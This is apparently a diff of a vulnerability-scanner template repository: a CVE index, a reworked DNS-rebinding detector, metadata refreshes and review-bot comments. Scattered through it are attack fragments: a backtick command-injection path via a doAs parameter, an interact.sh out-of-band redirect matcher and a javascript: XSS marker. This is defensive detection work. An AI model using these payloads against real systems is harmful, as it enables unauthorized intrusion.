{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
@ -2298,6 +2303,7 @@
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}


@ -1 +1 @@
eb2a2554dd005ef35adf0ff115ae4913
d1c0809e63305403ca431401cfcebe07


@ -1,5 +1,4 @@
id: dns-rebinding
info:
name: DNS Rebinding Attack
author: ricardomaia
@ -10,6 +9,8 @@ info:
- https://capec.mitre.org/data/definitions/275.html
- https://payatu.com/blog/dns-rebinding/
- https://heimdalsecurity.com/blog/dns-rebinding/
metadata:
max-request: 2
tags: redirect,dns,network
dns:
@ -20,7 +21,7 @@ dns:
- type: regex
part: answer
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
extractors:
- type: regex
@ -28,35 +29,22 @@ dns:
name: IPv4
group: 1
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- name: "{{FQDN}}"
type: AAAA
matchers:
# IPv6 Compressed
# IPv6 Compressed and Full
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
# IPv6
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
extractors:
- type: regex
part: answer
name: IPv6_Compressed
name: IPv6_ULA
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
- type: regex
part: answer
name: IPv6
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
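Review bot: The rewritten IPv4 pattern (`IN\s+A\s+(127\.0\.0\.1|10\.…|172\.…|192\.168\.…)$`) still treats only the single address 127.0.0.1 as loopback and has no branch for 169.254.0.0/16, so an answer pointing at another 127.0.0.0/8 address or at a link-local address is not reported. Widening the first alternative to `127\.\d{1,3}\.\d{1,3}\.\d{1,3}` and adding `169\.254\.\d{1,3}\.\d{1,3}` in both the matcher and the extractor would close that gap. The AAAA pattern is left unanchored while the A matcher ends in `$`, and it covers only `fd…` prefixes, not `::1` or IPv4-mapped forms; a short comment above each regex naming the ranges it is meant to cover would make that scope explicit. Which of the doubled lines is the new side is inferred from the shorter pattern, since the +/- markers are not shown on this page.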


@ -1,4 +1,4 @@
id: linkedin-client-id
id: linkedin-id
info:
name: Linkedin Client ID


@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-25031
cwe-id: CWE-20
epss-score: 0.00265
epss-percentile: 0.64105
epss-percentile: 0.65414
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -30,7 +30,6 @@ info:
shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057"
tags: headless,cve,cve2018,swagger,xss,smartbear
headless:
- steps:
- args:
@ -71,4 +70,4 @@ headless:
words:
- "swagger"
case-insensitive: true
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950


@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
epss-score: 0.97564
epss-percentile: 0.99999
epss-score: 0.97559
epss-percentile: 0.99997
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata:
max-request: 8
@ -58,4 +58,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799
cwe-id: CWE-22
epss-score: 0.17844
epss-percentile: 0.95686
epss-percentile: 0.96002
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950


@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287
epss-score: 0.11315
epss-percentile: 0.94677
epss-score: 0.11416
epss-percentile: 0.95073
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950


@ -15,13 +15,14 @@ info:
- https://wordpress.org/plugins/jsmol2wp/
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20463
cwe-id: CWE-22
epss-score: 0.01939
epss-percentile: 0.87393
epss-percentile: 0.88289
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950


@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-24223
cwe-id: CWE-79
epss-score: 0.00976
epss-percentile: 0.81758
epss-score: 0.0069
epss-percentile: 0.79602
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950


@ -14,13 +14,15 @@ info:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21805
cwe-id: CWE-78
epss-score: 0.97374
epss-percentile: 0.99892
epss-percentile: 0.99895
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2021-22873
cwe-id: CWE-601
epss-score: 0.00922
epss-percentile: 0.81209
epss-percentile: 0.82474
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -49,4 +49,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950


@ -6,26 +6,26 @@ info:
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
remediation: Fixed in 3.4.12
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wclovers
product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
@ -67,4 +67,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950
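Review bot: The `tags:` line lists `wpscan` twice (first entry and again before `sqli`); the second occurrence should be dropped so tag filters and statistics count the template once: `tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli`. The metadata block also shows `max-request` as both 1 and 3 while `flow:` references only `http(1) && http(2)`. The request definitions are outside the visible hunks, so confirm the new count matches the number of requests the template actually sends.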


@ -18,8 +18,8 @@ info:
cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata:
max-request: 1
shodan-query: title:"openSIS"
shodan-query: "title:\"openSIS\""
max-request: 2
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
http:
@ -42,4 +42,4 @@ http:
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition: and
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950


@ -21,7 +21,7 @@ info:
cve-id: CVE-2022-0776
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
epss-percentile: 0.40075
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
metadata:
vendor: revealjs
@ -48,4 +48,4 @@ headless:
part: extract
words:
- "true"
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-26263
cwe-id: CWE-79
epss-score: 0.00147
epss-percentile: 0.50638
epss-percentile: 0.49633
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -43,4 +43,4 @@ headless:
- '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js'
condition: and
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950


@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-30776
cwe-id: CWE-79
epss-score: 0.00112
epss-percentile: 0.44504
epss-percentile: 0.43631
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950


@ -37,7 +37,7 @@ variables:
http:
- method: GET
path:
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
matchers-condition: and
matchers:
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950


@ -6,28 +6,29 @@ info:
severity: medium
description: |
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
reference:
- https://tenable.com/security/research/tra-2022-30
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
- https://github.com/JoshuaMart/JoshuaMart
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38131
cwe-id: CWE-601
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
epss-score: 0.0006
epss-percentile: 0.23591
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
metadata:
product: connect
shodan-query: "http.favicon.hash:217119619"
fofa-query: "app=\"RStudio-Connect\""
max-request: 1
verified: true
vendor: rstudio
product: connect
